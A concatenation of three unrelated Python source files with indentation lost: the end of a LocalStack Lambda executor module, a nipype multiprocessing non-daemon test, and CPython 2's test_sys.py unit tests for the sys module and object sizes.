given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
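    # Illustrative sketch of the resulting classpath (hypothetical archive layout):
    # for archive "/opt/app/handler.jar" with a single dependency "/opt/app/lib/dep.jar",
    # the method would return roughly
    #   .:lib/dep.jar:handler.jar:*.jar:java/lib/*.jar
    # with all entries relative to the directory containing the archive.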
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
if not env_vars.get("AWS_ENDPOINT_URL"):
# Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
# can use it to ship patched Lambda runtimes that can interpret this config.
env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
localstack_hostname=main_endpoint, protocol="http"
)
return env_vars
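    # Illustrative sketch (the endpoint value is an assumption for demonstration): if the
    # main endpoint resolves to "host.docker.internal", the Lambda environment would get
    #   LOCALSTACK_HOSTNAME=host.docker.internal
    #   AWS_ENDPOINT_URL=http://host.docker.internal:<edge port>
    # unless the caller already provided values for these variables.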
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
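# Illustrative sketch (not part of the original module; config.LAMBDA_EXECUTOR is the
# assumed selector): callers are expected to pick an executor from the mapping above,
# roughly like
#
#   executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
#   executor.startup()
#
# The actual lookup and lifecycle handling live elsewhere in LocalStack.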
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
"""
Run a multiprocessing job and spawn child processes.
"""
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
"""
This function writes the value 45 to the given filename.
"""
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, "w") as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp(".txt", "test_engine_")[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile,))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
"""
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
"""
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix="test_engine_")
os.chdir(temp_dir)
pipe = pe.Workflow(name="pipe")
f1 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f1",
)
f2 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f2",
)
pipe.connect([(f1, f2, [("sum_out", "insum")])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config["execution"]["stop_on_first_crash"] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={"n_procs": 2, "non_daemon": nondaemon_flag},
)
names = [".".join((node._hierarchy, node.name)) for node in execgraph.nodes()]
node = list(execgraph.nodes())[names.index("pipe.f2")]
result = node.get_output("sum_out")
os.chdir(cur_dir)
rmtree(temp_dir)
return result
@pytest.mark.skipif(sys.version_info >= (3, 8), reason="multiprocessing issues in Python 3.8")
def test_run_multiproc_nondaemon_false():
"""
    This is the entry point for the test. A pipe of several multiprocessing jobs
    is executed twice: first without the nondaemon flag, then with it.
    Since the processes of the pipe start child processes, the execution only
    succeeds when the non_daemon flag is on.
"""
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
@pytest.mark.skipif(sys.version_info >= (3, 8), reason="multiprocessing issues in Python 3.8")
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
    assert result == 180  # 2 pipeline nodes * 2 child processes * 45 == 180
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
with test.test_support._check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (repr(stderr), repr(expected)))
        # test that the stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a non-existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assert_(executable in ["''", repr(sys.executable)], executable)
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
with test.test_support._check_py3k_warnings():
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3P3i'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|